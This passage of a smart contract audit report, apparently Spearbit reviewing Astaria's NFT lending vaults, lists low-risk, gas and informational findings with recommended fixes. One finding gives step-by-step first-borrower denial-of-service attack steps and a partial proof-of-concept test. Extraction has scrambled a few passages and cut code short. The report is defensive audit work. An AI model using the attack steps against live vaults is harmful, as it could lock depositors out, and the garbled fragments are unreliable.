+5.4.1 An owner might not be able to cancel all signed liens by calling incrementNonce() Severity: Low Risk Context: • VaultImplementation.sol#L87-L94 Description: If the vault owner or the delegate is phished into signing terms with consecutive nonces in a big range, they would not be able to cancel all those terms with the current incrementNonce() implementation, as it only increments the nonce one at a time. As an example, Seaport increments its counters using the following formula: n += blockhash(block.number - 1) << 0x80; Recommendation: It might be best to implement a nonce update similar to Seaport's to avoid this issue. Astaria: Recommendation applied in PR 314. Spearbit: Fixed.
+5.4.2 Borrower can borrow more than totalAssets from PublicVault Severity: Low Risk Context: PublicVault.sol#L468-L495 Description: Presently, the PublicVault contract lacks a mechanism to keep track of the total borrow amount within the contract. As a result, it does not trigger a revert when the borrowed amount exceeds the available totalAssets.
This creates a peculiar edge case where a user can transfer tokens to the PublicVault and proceed to borrow an amount greater than the totalAssets. Consequently, the PublicVault enters an "overborrowed loan" scenario. For instance, assuming the total assets of a PublicVault are 100 ETH, a user can transfer 200 ETH into the PublicVault and then take out a 200 ETH loan. This "donated loan" has several implications: • It increases the yield of all vault LP participants. • It serves as a buffer for the Vault when LP participants redeem their shares. However, this donated loan also poses challenges for the LPs: • An LP has no means to redeem the donated amount, as it does not alter the total assets. • In the event the donated loan is liquidated, the vault LP participants will bear the liability. Assuming the donated loan is liquidated with a 50 ETH deficit, the Vault will be cut 50 ETH. The absence of proper validation and handling of such donated loans may lead to unfair situations and unintended consequences, affecting both the protocol's health and the interests of LP participants. A malicious actor can potentially DoS the vault as a first borrower, since the borrower can take a loan when totalAssets is equal to 0. The first borrower can do the following things to DoS the vault (assume a publicVault that charges a protocol fee): 1. Transfer a small WETH balance to the publicVault. 2. Borrow a dust amount from the publicVault. 3. Borrow a small WETH balance. 4. Repay the dust loan. The protocol fee being charged is very small. publicVault._handleStrategistInterestReward(...) mints vault shares to the owner. The publicVault.totalSupply becomes very small while the interest of the second loan keeps accruing. The vault price (totalAssets / totalSupply) becomes large. 5. The following depositor would not be able to deposit. The attack described in this paragraph is not profitable, nor does it pose threats to real users. However, it does show that borrowing amounts that are larger than totalAssets can lead to weird states that haven't been well studied. This is a potential issue that should be investigated further if we allow borrowing when totalAssets is equal to 0. forge test --mt testFirstBorrowerAttack --ffi function testFirstBorrowerAttack() public { TestNFT nft = new TestNFT(3); address tokenContract = address(nft); uint256 tokenId = uint256(1); uint256 tokenId2 = uint256(2); // @audit: create a public vault that charges vaultFee address payable publicVault = _createPublicVault({ strategist: strategistOne, delegate: strategistTwo, epochLength: 14 days, vaultFee: 10e17 });
vm.warp(block.timestamp + 1 days); // totalAsset accrues while the total supply is 1 wei WETH9.deposit{value: 100 ether}(); WETH9.approve(address(TRANSFER_PROXY), 100 ether); vm.expectRevert("VALUE_TOO_SMALL"); ASTARIA_ROUTER.depositToVault( PublicVault(payable(publicVault)), address(msg.sender), 100 ether, 0 ); } 42 +5.4.3 Error handling for USDT transactions in TransferProxy Severity: Low Risk Context: TransferProxy.sol#L74C1-L85 Description: To handle edge cases where the receiver is blacklisted, TransferProxy.tokenTransferFromWithErrorReceiver(...) is designed to catch errors that may occur during the first transfer attempt and then proceed to send the tokens to the error receiver. try ERC20(token).transferFrom(from, to, amount) {} catch { _transferToErrorReceiver(token, from, to, amount); } However, it's worth noting that this approach may not be compatible with non-standard ERC20 tokens (e.g., USDT) that do not return any value after a transferFrom operation. The try-catch pattern in Solidity can only catch errors resulting from reverted external contract calls, but it does not handle errors caused by inconsistent return values. Consequently, when using USDT, the entire transaction will revert. Recommendation: We can make a slight modification to the safeTransferLib to handle reverts from external contract calls while remaining compatible with USDT. function trySafeTransferFrom( ERC20 token, address from, address to, uint256 amount ) internal returns(bool success){ assembly { // Get a pointer to some free memory. let freeMemoryPointer := mload(0x40) // Write the abi-encoded calldata into memory, beginning with the function selector. mstore(freeMemoryPointer, 0x23b872dd00000000000000000000000000000000000000000000000000000000) mstore(add(freeMemoryPointer, 4), from) // Append the "from" argument. mstore(add(freeMemoryPointer, 36), to) // Append the "to" argument. mstore(add(freeMemoryPointer, 68), amount) // Append the "amount" argument. success := and( // Set success to whether the call reverted, if not we check it either // returned exactly 1 (can't just be non-zero data), or had no return data. or(and(eq(mload(0), 1), gt(returndatasize(), 31)), iszero(returndatasize())), // We use 100 because the length of our calldata totals up like so: 4 + 32 * 3. // We use 0 and 32 to copy up to 32 bytes of return data into the scratch space. // Counterintuitively, this call must be positioned second to the or() call in the // surrounding and() call or else returndatasize() will be zero during the computation. call(gas(), token, 0, freeMemoryPointer, 100, 0, 32) ) } // Do not revert the transaction when it fails. Return the state instead. // require(success, "TRANSFER_FROM_FAILED"); } function tokenTransferFromWithErrorReceiver( address token, address from, address to, uint256 amount ) external requiresAuth { 43 if (!trySafeTransferFrom(token, from, to, amount)) { _transferToErrorReceiver(token, from, to, amount); } } Please note that this approach may reduce the codebase's readability. Consider whether you want to support edge cases where the receiver is blacklisted. Astaria: Fixed in PR 339. Spearbit: Verified. +5.4.4 PublicVault does not handle funds in errorReceiver Severity: Low Risk Context: LienToken.sol#L392-L430 During LienToken loan attempting repayment pull Description: involves PROXY.tokenTransferFromWithErrorReceiver. The implementation in the TransferProxy contract involves sending the tokens to an error receiver that is con- trolled by the original receiver. 
However, this approach can lead to accounting errors in the PublicVault as PublicVault does not pull tokens from the error receiver. process transferProxy.TRANSFER_- LienToken.MakePayment(...), function from the in the tokens using user the to function tokenTransferFromWithErrorReceiver( // ... ) { try ERC20(token).transferFrom(from, to, amount) {} catch { _transferToErrorReceiver(token, from, to, amount); } } Note that, in practice, tokens would not be transferred to the error receiver. The issue is hence considered to be a low-risk issue. Recommendation: PROXY.tokenTransferFromWithErrorReceiver. Use TRANSFER_PROXY.tokenTransferFrom instead of transferProxy.TRANSFER_- +5.4.5 Inconsistent Vault Fee Charging during Loan Liquidation via WithdrawProxy Severity: Low Risk Context: WithdrawProxy.sol#L288-L337, PublicVault.sol#L553-L569 Description: In the smart contract code of PublicVault, there is an inconsistency related to the charging of fees when a loan is liquidated at epoch's roll and the lien is sent to WithdrawProxy. The PublicVault.owner is supposed to take a ratio of the interest paid as the strategist's reward, and the fee should be charged when a payment is made in the function PublicVault.updateVault(...), regardless of whether it's a normal payment or a liquidation payment. It appears that the fee is not being charged when a loan is liquidated at epoch's roll and the lien is sent to With- drawProxy. This discrepancy could potentially lead to an inconsistent distribution of fees and rewards. Recommendation: Handle strategist reward fee in WithdrawProxy.claim(...). Astaria: Acknowledged. Spearbit: Acknowledged. 44 +5.4.6 VaultImplementation.init(...) silently initialised when the allowlist parameters are not throughly validated Severity: Low Risk Context: • VaultImplementation.sol#L183-L192 Description: In VaultImplementation.init(...), if params.allowListEnabled is false but params.allowList is not empty, s.allowList does not get populated. Recommendation: It might be best to check the above scenario and in the case it is detected to revert the transaction. +5.4.7 Several functions in AstariaRouter can be made non-payable Severity: Low Risk Context: AstariaRouter.sol#L118-L173, AstariaRouter.sol#L202 Description: Following functions in AstariaRouter are payable when they should never be sent the native token: mint(), deposit(), withdraw(), redeem(), pullToken() Recommendation: Remove the payable keyword for the highlighted functions. +5.4.8 Loan duration can be reduced at the time of borrowing without user permission Severity: Low Risk Context: AstariaRouter.sol#L889 Description: Requested loan duration, if greater than the maximum allowed duration (the time to next epoch's end), is set to this maximum value: if (timeToSecondEpochEnd < lien.details.duration) { lien.details.duration = timeToSecondEpochEnd; } This happens without explicit user permission. Recommendation: Consider reverting in this case to avoid any surprises for the borrower. made, this behavior should be documented for awareness. If no changes are +5.4.9 Native tokens sent to DepositHelper can get locked Severity: Low Risk Context: • DepositHelper.sol#L43-L45 Description: DepositHelper has the following two endpoints: fallback() external payable {} receive() external payable {} If one calls this contract by not supplying the deposit(...) function signature, the msg.value provided would get locked in this contract. 
Recommendation: If there isn't a plan to update this contract to use its own balance, it would be great to remove these endpoints: 45 - - fallback() external payable {} receive() external payable {} Astaria: Fixed in PR 334. Spearbit: Fixed. +5.4.10 Updated ...EpochLength values are not validated Severity: Low Risk Context: • AstariaRouter.sol#L319-L322 Description: Sanity check is missing for updated s.minEpochLength and s.maxEpochLength. Need to make sure s.minEpochLength <= s.maxEpochLength Recommendation: Make sure the updated values still hold the above invariant. Astaria: Fixed in PR 345. Spearbit: Fixed. +5.4.11 CollateralToken's conduit would have an open channel to an old Seaport when Seaport is updated Severity: Low Risk Context: • CollateralToken.sol#L343-L365 Description: After filing for a new Seaport the old Seaport would still have an open channel to it from the Col- lateralToken's conduit (assuming the old and new Seaport share the same conduit controller). Recommendation: It might be best to close the channel to the old Seaport in the same filing call. +5.4.12 CollateralToken's tokenURI uses the underlying assets's tokenURI Severity: Low Risk Context: • CollateralToken.sol#L437-L447 Description: Since the CollateralToken positions can be sold on secondary markets like OpenSea, the tokenURI endpoint should be customised to avoid misleading users and it should contain information relating to the Collat- eralToken and not just its underlying asset. It would also be great to pull information from its associated lien to include here. • What-is-OpenSea-s-copymint-policy. • docs.opensea.io/docs/metadata-standards. • Necromint got banned on OpenSea. Recommendation: Define/design a customised tokenURI for CollateralToken. Astaria: OpenSea has approved previous versions though we are planning to introduce a customized image. Fixed in PR 340 by introducing web2 endpoints for these queries. Spearbit: Fixed. 46 +5.4.13 Filing to update one of the main contract for another main contract lacks validation Severity: Low Risk Context: • AstariaRouter.sol#L402-L409 • CollateralToken.sol#L330-L332 • LienToken.sol#L87-L90 Description: The main contracts AstariaRouter, CollateralToken, and LienToken all need to be aware of each other and form a connected triangle. They are all part of a single unit and perhaps are separated into 3 different contract due to code size and needing to have two individual ERC721 tokens. Their authorised filing structure is as follows: • Note that one cannot file for CollateralToken to change LienToken as the value of LienToken is only set during the CollateralToken's initialisation. If one files to change one of these nodes and forget to check or update the links between these contract, the triangle above would be broken. Recommendation: To ensure the connectivity of the above triangle: 1. Each contract/node has two storage variables for the other 2 nodes 2. Each node should have an authorised endpoint to file update for the other 2 nodes. 3. Once a link has been established between 2 nodes the changes should be propagated to the 3rd node to ensure connectivity. One can also have a different design where there is an external contract that manages the nodes and their links: to swap one of these nodes we would 1. Each contract/node has two storage variables for the other 2 nodes 2. 
+5.4.14 TRANSFER_PROXY is not queried in a consistent fashion
Severity: Low Risk
Context: • CollateralToken.sol#L167 • LienToken.sol#L419 • AstariaRouter.sol#L204 • Deploy.sol#L84
Description: Different usages of TRANSFER_PROXY and how it is queried: • AstariaRouter: Used in pullToken(...) to move tokens from the msg.sender to another address. • CollateralToken: Used in validateOrder(...), where Seaport has called back into. Here CollateralToken gives approval to TRANSFER_PROXY, which is queried from AstariaRouter, for the settlement tokens. TRANSFER_PROXY is also used to transfer tokens. • LienToken: In _payment(...) TRANSFER_PROXY is used to transfer tokens from CollateralToken to the lien owner. This implies that the TRANSFER_PROXY used in CollateralToken should be the same as the one used in LienToken. Therefore, from the above we see that: 1. TRANSFER_PROXY holds token approvals for ERC20 or wETH tokens used as lien tokens. 2. TRANSFER_PROXY's address should be the same at all call sites for the different contracts AstariaRouter, CollateralToken and LienToken. 3. Except for CollateralToken, which queries TRANSFER_PROXY from AstariaRouter, the other two contracts AstariaRouter and LienToken read this value from their storage. Note that the deployment script assigns the same TRANSFER_PROXY to all 3 main contracts in the codebase: AstariaRouter, CollateralToken, and LienToken.
Recommendation: To guarantee that TRANSFER_PROXY is the same for all 3 contracts, we can redesign the codebase as follows: 1. Allow filing an update for TRANSFER_PROXY through only one contract (maybe AstariaRouter). Upon filing this update, we would call the other two contracts to update their corresponding TRANSFER_PROXY value in storage so that this value stays in sync. This would save gas as well, since when we would like to query this value we would read it from the current contract in scope instead of reading it from another contract's storage. 2. Only query the TRANSFER_PROXY from the current contract's storage.
Astaria: TransferProxy is now queried from the AstariaRouter: • PR 342 • PR 342 The applied solution bears the cost of querying the transfer proxy on the users, as opposed to the suggestion from the above recommendation.
Spearbit: Fixed.
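A sketch of recommendation 1 (hypothetical names; the actual filing flow differs): the router is the single filing point and pushes the new TRANSFER_PROXY into the other two contracts, so each contract afterwards reads a local, always-in-sync copy:

pragma solidity ^0.8.17;

interface ITransferProxyHolder {
    function setTransferProxy(address proxy) external; // restricted to the router
}

contract RouterFilingSketch {
    address public immutable owner;
    address public transferProxy;
    ITransferProxyHolder public collateralToken;
    ITransferProxyHolder public lienToken;

    constructor(ITransferProxyHolder collateralToken_, ITransferProxyHolder lienToken_) {
        owner = msg.sender;
        collateralToken = collateralToken_;
        lienToken = lienToken_;
    }

    // Single filing point: update the local copy and push the same address
    // into the other two contracts so all three always agree.
    function fileTransferProxy(address newProxy) external {
        require(msg.sender == owner, "unauthorized");
        transferProxy = newProxy;
        collateralToken.setTransferProxy(newProxy);
        lienToken.setTransferProxy(newProxy);
    }
}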
+5.4.15 Multicall, when inherited by ERC4626RouterBase, does not bubble up reverts correctly
Severity: Low Risk
Context: • Multicall.sol#L22-L29
Description: Multicall does not bubble up the reverts correctly. The current implementation uses the following snippet to bubble up the reverts: // https://github.com/AstariaXYZ/astaria-gpl/blob/.../src/Multicall.sol pragma solidity >=0.7.6; if (!success) { // Next 5 lines from https://ethereum.stackexchange.com/a/83577 if (result.length < 68) revert(); assembly { result := add(result, 0x04) } revert(abi.decode(result, (string))); } // https://github.com/AstariaXYZ/astaria-gpl/blob/.../src/ERC4626RouterBase.sol pragma solidity ^0.8.17; ... abstract contract ERC4626RouterBase is IERC4626RouterBase, Multicall { ... } This method of bubbling up does not work with newer types of errors: • Panic(uint256), 0.8.0 (2020-12-16) • Custom errors, introduced in 0.8.4 (2021-04-21) • ...
Recommendation: To bubble up the reverts correctly we can revert like the following, but this requires updating Multicall's pragma to solidity >=0.8.13 (due to using "memory-safe"): assembly ("memory-safe") { if iszero(success) { revert(add(result, 32), mload(result)) } }

5.5 Gas Optimization

+5.5.1 Cache VAULT().ROUTER().LIEN_TOKEN()
Severity: Gas Optimization
Context: WithdrawProxy.sol#L394-L399
Description: In WithdrawProxy.onERC721Received(), VAULT().ROUTER().LIEN_TOKEN() is read twice, which leads to extra external calls.
Recommendation: Store VAULT().ROUTER().LIEN_TOKEN() in a variable.

+5.5.2 Define named constants for the keccak256 values used in computeDomainSeparator()
Severity: Gas Optimization
Context: • ERC20-Cloned.sol#L162-L165
Description/Recommendation: computeDomainSeparator() returns: keccak256( abi.encode( keccak256( "EIP712Domain(string version,uint256 chainId,address verifyingContract)" ), keccak256("1"), block.chainid, address(this) ) ); keccak256("1") and keccak256("EIP712Domain(string version,uint256 chainId,address verifyingContract)") can be made into named contract-level constants.

+5.5.3 s.liquidationWithdrawRatio can be turned into a stack variable or be cached during its usage
Severity: Gas Optimization
Context: • PublicVault.sol#L360-L383
Description/Recommendation: s.liquidationWithdrawRatio is only used in this context and only in the processEpoch() function (besides the getter methods). If querying this value is not needed, it can be turned into a local stack variable. Even if it is desired to query this parameter, it would be best to save it to storage at the very end, to avoid writing to and reading from storage multiple times.

+5.5.4 s.currentEpoch can be cached in processEpoch()
Severity: Gas Optimization
Context: • PublicVault.sol#L336-L357 • PublicVault.sol#L393
Description: s.currentEpoch is read from storage multiple times in processEpoch().
Recommendation: To save gas on reading from storage, s.currentEpoch can be cached in processEpoch().

+5.5.5 Use basis points for ratios
Severity: Gas Optimization
Context: IAstariaRouter.sol#L58, IAstariaRouter.sol#L62
Description: Fee ratios are represented through two state variables for the numerator and denominator. A basis point system can be used in its place, as it is simpler (the denominator is always set to 10_000) and more gas efficient, as the denominator is then a constant.
Recommendation: Use a basis point system to represent ratios. Remove the denominator state variables and use 10_000 as a constant in their place.
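A sketch of the basis-points recommendation (hypothetical storage layout, not the actual router): a single numerator against a constant 10_000 denominator replaces the numerator/denominator pair of state variables:

pragma solidity ^0.8.17;

contract FeeBpsSketch {
    uint256 public constant BPS_DENOMINATOR = 10_000; // constant: no storage read
    uint256 public protocolFeeBps = 250;              // e.g. 2.50%

    function feeOn(uint256 amount) public view returns (uint256) {
        return (amount * protocolFeeBps) / BPS_DENOMINATOR;
    }
}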
+5.5.6 liquidatorNFTClaim()'s arguments can be made calldata
Severity: Gas Optimization
Context: CollateralToken.sol#L244-L245
Description: The following arguments can be converted to calldata to save gas on copying them to memory: function liquidatorNFTClaim( ILienToken.Stack memory stack, OrderParameters memory params, uint256 counterAtLiquidation ) external whenNotPaused {
Recommendation: Update the memory arguments to calldata.

+5.5.7 a.mulDivDown(b,1) is equivalent to a*b
Severity: Gas Optimization
Context: PublicVault.sol#L535
Description: The highlighted code below uses the pattern a.mulDivDown(b, 1), which is equivalent to a*b except for the revert parameters in case of an overflow: return uint256(s.slope).mulDivDown(delta_t, 1) + uint256(s.yIntercept);
Recommendation: Update the code to: return uint256(s.slope)*delta_t + uint256(s.yIntercept);

+5.5.8 try/catch can be removed for simplicity
Severity: Gas Optimization
Context: RepaymentHelper.sol#L33-L44
Description: The following code catches a revert in the external call WETH.deposit{value: owing}() and then reverts itself in the catch clause: try WETH.deposit{value: owing}() { WETH.approve(transferProxy, owing); // make payment lienToken.makePayment(stack); // check balance if (address(this).balance > 0) { // withdraw payable(msg.sender).transfer(address(this).balance); } } catch { revert(); } This effect can also be achieved without using try/catch, which simplifies the code too.
Recommendation: Update the highlighted code as:
- try WETH.deposit{value: owing}() {
+ WETH.deposit{value: owing}();
  WETH.approve(transferProxy, owing);
  // make payment
  lienToken.makePayment(stack);
  // check balance
  if (address(this).balance > 0) {
    // withdraw
    payable(msg.sender).transfer(address(this).balance);
  }
- } catch {
-   revert();
- }

+5.5.9 Cache s.idToUnderlying[collateralId].auctionHash
Severity: Gas Optimization
Context: • CollateralToken.sol#L257-L266
Description: In liquidatorNFTClaim(...), s.idToUnderlying[collateralId].auctionHash is read twice from storage.
Recommendation: It would be great to cache s.idToUnderlying[collateralId].auctionHash to avoid reading it from storage multiple times.

+5.5.10 Cache keccak256(abi.encode(stack))
Severity: Gas Optimization
Context: • LienToken.sol#L150-L153 • LienToken.sol#L169 • LienToken.sol#L300 • LienToken.sol#L334
Description: In LienToken._handleLiquidation(...) lienId is calculated as: uint256 lienId = uint256(keccak256(abi.encode(stack))); Note that _handleLiquidation(...) is called by handleLiquidation(...), which has a modifier validateCollateralState(...): validateCollateralState( stack.lien.collateralId, keccak256(abi.encode(stack)) ) And thus keccak256(abi.encode(stack)) is performed twice. The same multiple hashing calculation also happens in the makePayment(...) flow.
Recommendation: It would be best to cache the keccak256(abi.encode(stack)) value for the above flows/endpoints. One way to achieve this is to turn validateCollateralState(...) into an internal function hook: function _validateCollateralState(LienStorage storage s, uint256 collateralId, bytes32 incomingHash) internal { if (incomingHash != s.collateralStateHash[collateralId]) { revert InvalidLienState(InvalidLienStates.INVALID_HASH); } } and at the call sites we could have: bytes32 h = keccak256(abi.encode(stack)); uint256 cid = stack.lien.collateralId; _validateCollateralState(s, cid, h); // h and cid can be reused
5.6 Informational

+5.6.1 Functions can be made view or pure
Severity: Informational
Context: AstariaRouter.sol#L565, CollateralToken.sol#L213
Description: Several functions can be made view or pure; the compiler also warns about these functions. For instance, _validateRequest() can be made view, and getSeaportMetadata() can be made pure instead of view.
Recommendation: Consider going through the compiler warnings and adding the view or pure keyword to those functions.

+5.6.2 Fix compiler generated warnings for unused arguments
Severity: Informational
Context: src, WithdrawProxy.sol#L173-L181
Description: Several functions have arguments which are not used, and the compiler generates a warning for each instance, cluttering the output. This makes it easy to miss useful warnings. Here is one example of a function with unused arguments: function deposit( uint256 assets, address receiver ) public virtual override(ERC4626Cloned, IERC4626) onlyVault returns (uint256 shares) { revert NotSupported(); }
Recommendation: Consider commenting out each argument highlighted by a compiler warning as follows: function deposit( uint256 /* assets */, address /* receiver */ ) public virtual override(ERC4626Cloned, IERC4626) onlyVault returns (uint256 /* shares */) { revert NotSupported(); }

+5.6.3 Non-lien NFT tokens can get locked in the vaults
Severity: Informational
Context: • PublicVault.sol#L494 • Vault.sol#L60
Description: When onERC721Received(...) is called on either a public or a private vault, it returns IERC721Receiver.onERC721Received.selector, and it performs extra logic only if the msg.sender is the LienToken and the operator is the AstariaRouter. This means NFT tokens other than lien tokens received by a vault will be locked.
Recommendation: It would be best to only return IERC721Receiver.onERC721Received.selector if: operator == address(ROUTER()) && msg.sender == address(ROUTER().LIEN_TOKEN()) and revert otherwise.
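A sketch of the recommended guard (simplified; it assumes the vault's existing ROUTER() accessor and IERC721Receiver import, and omits any vault-specific extra logic): accept the callback only for lien tokens routed through the AstariaRouter, and revert otherwise so stray NFTs are rejected instead of locked:

function onERC721Received(
    address operator,
    address, // from
    uint256, // tokenId
    bytes calldata
) external returns (bytes4) {
    if (
        operator == address(ROUTER()) &&
        msg.sender == address(ROUTER().LIEN_TOKEN())
    ) {
        return IERC721Receiver.onERC721Received.selector;
    }
    revert(); // any other safe NFT transfer is bounced back to the sender
}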
+5.6.4 Define currentWithdrawProxy closer to where it is used
Severity: Informational
Context: • PublicVault.sol#L336
Description/Recommendation: Make sure currentWithdrawProxy is defined closer to its first usage line. // check if there are LPs withdrawing this epoch WithdrawProxy currentWithdrawProxy = WithdrawProxy( s.epochData[s.currentEpoch].withdrawProxy ); if ((address(currentWithdrawProxy) != address(0))) {

+5.6.5 Validation checks should be performed at the beginning of processEpoch()
Severity: Informational
Context: • PublicVault.sol#L353-L357
Description: The following validation check for the data corresponding to the current epoch happens in the middle of processEpoch(), where some accounting has already been done: if (s.epochData[s.currentEpoch].liensOpenForEpoch > 0) { revert InvalidVaultState( InvalidVaultStates.LIENS_OPEN_FOR_EPOCH_NOT_ZERO ); }
Recommendation: It would be best to perform this validation at the beginning of the call to processEpoch(). This would make the flow of this endpoint more organised, and it would also save gas in the case that this condition causes a revert: function processEpoch() public { // check to make sure epoch is over if (timeToEpochEnd() > 0) { revert InvalidVaultState(InvalidVaultStates.EPOCH_NOT_OVER); } VaultData storage s = _loadStorageSlot(); if (s.withdrawReserve > 0) { revert InvalidVaultState(InvalidVaultStates.WITHDRAW_RESERVE_NOT_ZERO); } if (s.epochData[s.currentEpoch].liensOpenForEpoch > 0) { revert InvalidVaultState( InvalidVaultStates.LIENS_OPEN_FOR_EPOCH_NOT_ZERO ); } // the rest ... }

+5.6.6 Define an onlyOwner modifier for VaultImplementation
Severity: Informational
Context: • VaultImplementation.sol#L101 • VaultImplementation.sol#L119 • VaultImplementation.sol#L128 • VaultImplementation.sol#L137 • VaultImplementation.sol#L158 • VaultImplementation.sol#L196
Description: The following require statement has been used multiple times: require(msg.sender == owner());
Recommendation: It would be best to define a modifier or an internal function hook to refactor this requirement.
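A sketch of the suggested refactor (the applying function shown is hypothetical):

modifier onlyOwner() {
    require(msg.sender == owner());
    _;
}

// usage: replaces the inline require at each of the call sites listed above
function exampleRestrictedEndpoint() external onlyOwner {
    // ...
}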
+5.6.7 Vault is missing an interface
Severity: Informational
Context: • Vault.sol#L27
Description: Vault is missing an interface.
Recommendation: It would be best to add an interface IVault for Vault to document its endpoints and expected behaviour.

+5.6.8 transfer is used in RepaymentHelper.makePayment(...)
Severity: Informational
Context: • RepaymentHelper.sol#L40
Description: In RepaymentHelper.makePayment(...) the transfer function is used to return extra native tokens sent to this contract. The use of transfer, which restricts the amount of gas shared with the msg.sender, is not required; since there are no actions after this call site, it is safe to call the msg.sender directly to transfer these funds.
Recommendation: Use call instead of transfer to send back the extra native tokens: payable(msg.sender).call{value: address(this).balance}();

+5.6.9 Consider importing Uniswap libraries directly
Severity: Informational
Context: FullMathUniswap.sol, LiquidityAmounts.sol, TickMath.sol
Description: astaria-gpl copies the libraries highlighted above, which were originally written in Solidity v0.7, and refactors them to v0.8. Uniswap has also provided these contracts for Solidity v0.8 in branches named 0.8. See v3-core@0.8 and v3-periphery@0.8. Using these files directly reduces the amount of code owned by Astaria.
Recommendation: Consider replacing the following libraries: • FullMathUniswap.sol with Uniswap's FullMath.sol. • LiquidityAmounts.sol with Uniswap's LiquidityAmounts.sol. • TickMath.sol with Uniswap's TickMath.sol.

+5.6.10 Elements' orders are not consistent in solidity files
Severity: Informational
Context: General
Description: Elements' orders are not consistent in solidity files.
Recommendation: Consider adding the ordering rule to .solhint.json and resolving the order related warnings: { "extends": "solhint:recommended", "rules": { "compiler-version": ["error", "=0.8.17"], "func-visibility": ["warn", { "ignoreConstructors": true }], "avoid-suicide": "error", "ordering": "warn" } }

+5.6.11 FileType definitions are not consistent
Severity: Informational
Context: • IAstariaRouter.sol#L29 • ICollateralToken.sol#L71 • ILienToken.sol#L23
Description: Both ICollateralToken.FileType and ILienToken.FileType start their enums with NotSupported. The definition of FileType in IAstariaRouter is not consistent with that pattern. This might be due to having 0 as NotSupported so that the file endpoints would revert.
Recommendation: Consider having the same pattern for all 3 enums in this context.

+5.6.12 VIData.allowList members can transfer shares to entities not on the allowlist
Severity: Informational
Context: • IVaultImplementation.sol#L45
Description: allowList is only used to restrict the share recipients upon mint or deposit to a vault if allowListEnabled is set to true. These shareholders can later transfer their shares to other users who might not be on the allowList.
Recommendation: The above should be documented/commented.

+5.6.13 Extract common struct fields from IStrategyValidator implementations
Severity: Informational
Context: • CollectionValidator.sol#L23-L28 • UNI_V3Validator.sol#L29-L42 • UniqueValidator.sol#L23-L29 • IAstariaRouter.sol#L108
Description: All the IStrategyValidator implementations have the following data encoded in NewLienRequest.nlrDetails: struct CommonData { uint8 version; address token; // LP token for Uni_V3... address borrower; ILienToken.Details lienDetails; bytes moreData; // depends on each implementation }
Recommendation: It might be best to define a struct for this common piece. Also note that the fields in the decoded data have been reordered to show the unity between all the implementations. The above struct fields can be extracted out of nlrDetails and added as new fields to NewLienRequest. For the version field we can start using StrategyDetailsParam.version again instead.

+5.6.14 _createLien() takes in an extra argument
Severity: Informational
Context: LienToken.sol#L231
Description: _createLien(LienStorage storage s, ...) doesn't use s, and hence it can be removed as an argument.
Recommendation: Remove s as an argument from _createLien().

+5.6.15 unchecked has no effect
Severity: Informational
Context: PublicVault.sol#L509-L512
Description: unchecked only affects the arithmetic operations directly nested under it. In this case unchecked is unnecessary: unchecked { s.yIntercept = (_totalAssets(s)); s.last = block.timestamp.safeCastTo40(); }
Recommendation: Remove unchecked.

+5.6.16 Multicall can reuse msg.value
Severity: Informational
Context: Multicall.sol#L20
Description: A delegatecall forwards the same value for msg.value as found in the current context. Hence, all delegatecalls in a loop use the same value for msg.value. In the case of these calls using msg.value, each of them has the ability to use the native token balance of the contract itself: for (uint256 i = 0; i < data.length; i++) { (bool success, bytes memory result) = address(this).delegatecall(data[i]); ... }
Recommendation: In Astaria's case, native token is never sent to the protocol, hence the current usage of Multicall is safe. However, care needs to be taken if this changes in the future.

+5.6.17 Authorised entities can drain user assets
Severity: Informational
Context: • TransferProxy.sol#L66-L84
Description: An authorized entity can steal user-approved tokens (vault assets, vault tokens, ...) using these endpoints: function tokenTransferFrom( address token, address from, address to, uint256 amount ) external requiresAuth { ERC20(token).safeTransferFrom(from, to, amount); } function tokenTransferFromWithErrorReceiver( address token, address from, address to, uint256 amount ) external requiresAuth { try ERC20(token).transferFrom(from, to, amount) {} catch { _transferToErrorReceiver(token, from, to, amount); } } The same risk applies to all the other upgradable contracts.
Recommendation: Users need to be aware of the above risks.
+5.6.18 WETH can be made immutable in DepositHelper
Severity: Informational
Context: • DepositHelper.sol#L21 • DepositHelper.sol#L26
Description/Recommendation: DepositHelper has no setter for WETH and it only gets initialised in the constructor, so it can be made immutable.

+5.6.19 Conditional statement in _validateSignature(...) can be simplified/optimized
Severity: Informational
Context: • AstariaRouter.sol#L833
Description: When validating the vault strategist's (or delegate's) signature for the commitment, we perform the following check: if ( (recovered != strategist && recovered != delegate) || recovered == address(0) ) { revert IVaultImplementation.InvalidRequest( IVaultImplementation.InvalidRequestReason.INVALID_SIGNATURE ); } The conditional statement (recovered != strategist && recovered != delegate) can perhaps be optimised/simplified.
Recommendation: We can change the abovementioned conditional statement to: !(recovered == strategist || recovered == delegate) Gas diffs would need to be run to verify that this actually optimises the flow.

+5.6.20 AstariaRouter cannot deposit into private vaults
Severity: Informational
Context: • AstariaRouter.sol#L596-L602 • Vault.sol#L90-L95
Description: The allowlist for private vaults only includes the private vault's owner: function newVault( address delegate, address underlying ) external whenNotPaused returns (address) { address[] memory allowList = new address[](1); allowList[0] = msg.sender; RouterStorage storage s = _loadRouterSlot(); ... } Note that for private vaults we cannot modify or disable/enable the allowlist. It is always enabled and only includes the owner. That means only the owner can deposit into the private vault: function deposit( uint256 amount, address receiver ) public virtual whenNotPaused returns (uint256) { VIData storage s = _loadVISlot(); require(s.allowList[msg.sender] && receiver == owner()); ... } If the owner would like to use the AstariaRouter's interface by calling its deposit(...) or depositToVault(...) endpoint (which uses the pulling strategy from the transfer proxy), they would not be able to. Anyone can transfer the asset() tokens to this private vault directly, so the requirement require(s.allowList[msg.sender] ... ) seems to also be there to avoid potential mistakes when one is calling the ERC4626RouterBase.deposit(...) endpoint to deposit into the vault indirectly using the router.
Recommendation: If it is anticipated that owners will deposit into their private vault by using the AstariaRouter's interface, the AstariaRouter should be added to the allowlist upon initialisation of the private vault.
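A sketch of the recommendation, based on the newVault snippet quoted above (only the allowList construction changes; the rest of the function is elided):

address[] memory allowList = new address[](2);
allowList[0] = msg.sender;    // the private vault's owner
allowList[1] = address(this); // the AstariaRouter itself, enabling router deposits
// ... rest of newVault unchanged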
+5.6.21 The conditional statement when validating newStack.lien.details.liquidationInitialAsk can be simplified
Severity: Informational
Context: • AstariaRouter.sol#L576-L583
Description/Recommendation: In _validateRequest(...) we perform a check for newStack.lien.details.liquidationInitialAsk: if ( newStack.lien.details.liquidationInitialAsk < owingAtEnd || newStack.lien.details.liquidationInitialAsk == 0 ) { revert ILienToken.InvalidLienState( ILienToken.InvalidLienStates.INVALID_LIQUIDATION_INITIAL_ASK ); } owingAtEnd is calculated as: a_owed = a + ⌊(d · r · a) / 10^18⌋ where:
parameter → description
a_owed → owingAtEnd
a → params.lienRequest.amount
r → newStack.lien.details.rate
